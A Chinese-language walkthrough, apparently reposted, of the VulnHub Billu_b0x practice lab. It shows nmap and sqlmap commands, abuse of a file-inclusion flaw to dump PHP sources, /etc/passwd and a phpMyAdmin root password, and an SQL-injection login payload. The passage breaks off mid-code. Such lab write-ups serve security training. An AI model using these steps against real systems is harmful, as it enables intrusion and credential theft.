VulnHub渗透测试实战靶场 - Billu_b0x
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - Billu_b0x相关的知识,希望对你有一定的参考价值。
环境下载
戳此进行环境下载
Billu_b0x靶机搭建
将下载好的靶机环境,用VMware导入,将靶机和攻击机的网络连接设置为
NAT
模式
渗透测试
信息搜集
用Kali中的arp扫描探测一下:
sudo arp-scan -l
使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP:
sudo nmap -sP 192.168.23.1/24
确定目标ip地址:
192.168.23.130
用Nmap进行深度扫描:sudo nmap -sS -A 192.168.23.130 -oN billu.txt
发现目标开放了22端口和80端口
漏洞挖掘
访问80端口进入web首页,发现用户名口令输入框,并提示"Show me your SQLI skills"
漏洞挖掘思路:
- SQL注入:首页提示注入,想办法注入成功
- 暴破目录:用DirBuster暴破,看是否有新网页,找新漏洞
- 漏洞扫描:暴破的新网页,送进AWVS或APPScan扫漏洞
- 手动挖掘:暴破的新页面,通过Firefox挂burp代理,在burp中观察Request和Response包,手动找漏洞
- 查看每个网页的源码,看是否有提示
- 如得到用户名,密码,尝试登录ssh,如能连接上,无需反弹shell了
先用sqlmap进行测试:
sqlmap -u http://192.168.23.130/ --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql
,发现并没有什么效果
使用dirsearch扫描一下网站目录:
python3 dirsearch.py -u 192.168.23.130 -e *.php
,发现存在挺多200的页面
测试后发现在
http://192.168.23.130/test.php
存在文件包含
利用该漏洞,查看一下之前探测网站目录得到的php文件内容
- c.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
echo "connection failed -> " . mysqli_connect_error();
}
?>
- add.php
<?php
echo '<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name=image>
<input type=text name=name value="name">
<input type=text name=address value="address">
<input type=text name=id value=1337 >
<input type="submit" value="upload" name="upload">
</form>';
?>
- index.php
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
$_SESSION['logged']='';
}
if($_SESSION['logged']==true && $_SESSION['admin']!='')
{
echo "you are logged in :)";
header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un>   Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\\'s login">';
}
if(isset($_POST['login']))
{
$uname=str_replace('\\'','',urldecode($_POST['un']));
$pass=str_replace('\\'','',urldecode($_POST['ps']));
$run='select * from auth where pass=\\''.$pass.'\\' and uname=\\''.$uname.'\\'';
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "You are allowed<br>";
$_SESSION['logged']=true;
$_SESSION['admin']=$row['username'];
header('Location: panel.php', true, 302);
}
else
{
echo "<script>alert('Try again');</script>";
}
}
echo "<font size=5 face=\\"comic sans ms\\" style=\\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>
- test.php
?php
function file_download($download)
{
if(file_exists($download))
{
header("Content-Description: File Transfer");
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Accept-Ranges: bytes');
header('Content-Disposition: attachment; filename="'.basename($download).'"');
header('Content-Length: ' . filesize($download));
header('Content-Type: application/octet-stream');
ob_clean();
flush();
readfile ($download);
}
else
{
echo "file not found";
}
}
if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{
echo '\\'file\\' parameter is empty. Please provide file path in \\'file\\' parameter ';
}
- panel.php
<?php
session_start();
include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
header('Location: index.php', true, 302);
exit();
}
echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
unset($_SESSION['logged']);
unset($_SESSION['admin']);
header('Location: index.php', true, 302);
}
echo '<hr><br>';
echo '<form method=post>
<select name=load>
<option value="show">Show Users</option>
<option value="add">Add User</option>
</select>
 <input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
$dir=getcwd();
$choice=str_replace('./','',$_POST['load']);
if($choice==='add')
{
include($dir.'/'.$choice.'.php');
die();
}
if($choice==='show')
{
include($dir.'/'.$choice.'.php');
die();
}
else
{
include($dir.'/'.$_POST['load']);
}
}
if(isset($_POST['upload']))
{
$name=mysqli_real_escape_string($conn,$_POST['name']);
$address=mysqli_real_escape_string($conn,$_POST['address']);
$id=mysqli_real_escape_string($conn,$_POST['id']);
if(!empty($_FILES['image']['name']))
{
$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
$image=array('jpeg','jpg','gif','png');
if(in_array($r,$image))
{
$finfo = @new finfo(FILEINFO_MIME);
$filetype = @$finfo->file($_FILES['image']['tmp_name']);
if(preg_match('/image\\/jpeg/',$filetype ) || preg_match('/image\\/png/',$filetype ) || preg_match('/image\\/gif/',$filetype ))
{
if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
{
echo "Uploaded successfully ";
$update='insert into users(name,address,image,id) values(\\''.$name.'\\',\\''.$address.'\\',\\''.$iname.'\\', \\''.$id.'\\')';
mysqli_query($conn, $update);
}
}
else
{
echo "<br>i told you dear, only png,jpg and gif file are allowed";
}
}
else
{
echo "<br>only png,jpg and gif file are allowed";
}
}
}
?>
- /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
审计得到的有关信息可以发现:
- 在
/etc/passwd
中,发现1个id 1000
的账号ica,ssh连接的用户名可以是ica或root- 在
c.php
中发现mysql连接用户名:billu
,密码:b0x_billu
以及数据库名:ica_lab
通过得到的mysql密码登录phpmyadmin,尝试后发现无法登录(原因在后面阐述)
重装环境之后再次用之前得到的信息登录,在ica_lab数据库的auth表中,找到web登录的用户名:
biLLu
,密码:hEx_it
getshell
获得root权限
继续暴破phpmy目录,文件包含phpmyadmin配置文件,由于phpmyadmin的默认的配置文件是
config.inc.php
,用之前文件包含的漏洞得到phpmyadmin的默认的配置文件的内容,得到用户为root
,密码为roottoor
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
/* End of servers configuration */
$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>
用xshell登录,得到root权限
之前mysql登不上检测后发现mysql状态为:mysql stop/waiting
,推测mysql被之前的高线程目录暴破、扫描导致故障
获得非root权限
- 方式一:用phpmyadmin中得到的web页面登录账号密码登录
- 方式二:审计index.php源码,发现以下过滤规则:
$uname=str_replace('\\'','',urldecode($_POST['un']));
$pass=str_replace('\\'','',urldecode($_POST['ps']));
str_replace的作用是将字符串
\\'
替换为空,因此构造SQL注入登录payload时,必须含有\\'
字符串,否则会报错,urldecode的作用是将输入解码,所以可以用Payload:用户名密码均为' or 1=1 -- \\'
,成功登入web页面
点击
add user
进入添加账号界面,这是一个图片上传漏洞点,利用图片上传和文件包含获得shell
查看之前利用文件包含漏洞获得的panel.php源码,发现panel.php存在本地文件包含漏洞
if(isset($_POST['continue']))
{
$dir=getcwd();
$choice=str_replace('./','',$_POST['load']);
if($choice==='add')
{
include($dir.'/'.$choice.'.php');
die();
}
if($choice==='show')
{
include($dir.'/'.$choice.VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1